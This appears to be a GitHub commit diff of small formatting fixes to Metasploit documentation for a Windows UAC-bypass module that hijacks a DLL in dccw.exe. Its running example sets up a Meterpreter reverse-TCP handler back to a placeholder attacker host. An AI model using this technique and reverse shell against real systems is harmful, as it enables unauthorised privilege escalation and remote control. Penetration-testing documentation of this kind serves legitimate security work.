Skip to content

Commit ffa29de

Browse files
authored
Update bypassuac_injection_winsxs.md
1 parent 59d03ec commit ffa29de

File tree

1 file changed

+6
-7
lines changed

1 file changed

+6
-7
lines changed

documentation/modules/exploit/windows/local/bypassuac_injection_winsxs.md

Lines changed: 6 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -3,18 +3,17 @@
33
## Description
44

55
This module adds a bypass for UAC that relies on DLL hijacking of the dccw.exe process. It has been tested on and
6-
supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions
7-
of Windows 7.
6+
supports both x86 and x64 releases of Windows 8, 8.1, 10_1511, 10_1607, and 10_1703. It does not work with any versions of Windows 7.
87

98
### Vulnerable application setup
109
Not Applicable; works on stock Windows releases.
1110

1211
### Running Example:
1312
```
14-
> use exploit/multi/handleruse expl
15-
> set payload windows/meterpreter/reverse_tcp
13+
> use exploit/multi/handler
14+
> set payload windows/meterpreter/reverse_tcp
1615
payload => windows/meterpreter/reverse_tcp
17-
> set LHOST <MSF_IP>
16+
> set LHOST <MSF_IP>
1817
LHOST => <MSF_IP>
1918
> set LPORT 30009
2019
LPORT => 30009
@@ -31,7 +30,7 @@ Payload options (windows/meterpreter/reverse_tcp):
3130
Name Current Setting Required Description
3231
---- --------------- -------- -----------
3332
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
34-
LHOST <MSF_IP> yes The listen address
33+
LHOST <MSF_IP> yes The listen address
3534
LPORT 30009 yes The listen port
3635
3736
@@ -137,7 +136,7 @@ Payload options (windows/meterpreter/reverse_tcp):
137136
Name Current Setting Required Description
138137
---- --------------- -------- -----------
139138
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
140-
LHOST <MSF_IP> yes The listen address
139+
  LHOST     <MSF_IP>   yes       The listen address
141140
LPORT 30010 yes The listen port
142141
143142

0 commit comments

Comments
 (0)